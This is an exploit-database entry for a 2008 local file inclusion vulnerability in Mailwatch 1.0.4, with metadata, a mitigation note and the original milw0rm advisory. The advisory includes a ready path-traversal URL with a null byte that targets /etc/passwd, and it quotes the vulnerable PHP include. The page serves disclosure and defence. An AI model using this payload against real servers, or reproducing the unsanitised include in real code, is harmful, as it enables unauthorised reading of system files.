header-logo
Suggest Exploit
vendor:
Mailwatch
by:
dun
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Mailwatch
Affected Version From: 1.0.4
Affected Version To: 1.0.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Mailwatch <= 1.0.4 Local File Inclusion Vulnerability

A vulnerability in Mailwatch <= 1.0.4 allows an attacker to include arbitrary files from the local system via the 'doc' parameter in the 'docs.php' script.

Mitigation:

Upgrade to the latest version of Mailwatch.
Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ##################################################################
 #  [ mailwatch <= 1.0.4 ]   Local File Inclusion Vulnerability   #
 ##################################################################
 #
 # Script site: http://sourceforge.net/projects/mailwatch/
 #
 # Vuln: 
 # http://site.com/[mailwatch-1.0.4]/mailscanner/docs.php?doc=../../../../../../../etc/passwd%00
 #      
 #
 # Bug: ./mailwatch-1.0.4/mailscanner/docs.php (lines: 23-34)
 #
 # ...
 #	if (isset($_GET[doc])) {
 #	 include("docs/".$_GET[doc].".html");
 #	} else {
 #	 echo "<TABLE WIDTH=100% CLASS=\"BOXTABLE\">\n";
 #	 echo " <TR>\n";
 #	 echo "  <TD>\n";
 #	 echo "  <H1>Documentation</H1>\n";
 #	 echo "  This page does not require authentication, so you can put links to your site documentation here and allow your users to access it if you wish.";
 #	 echo "  </TD>\n";
 #	 echo " </TR>\n";
 #	 echo "</TABLE>\n";
 #	}
 # ... 			    
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-24]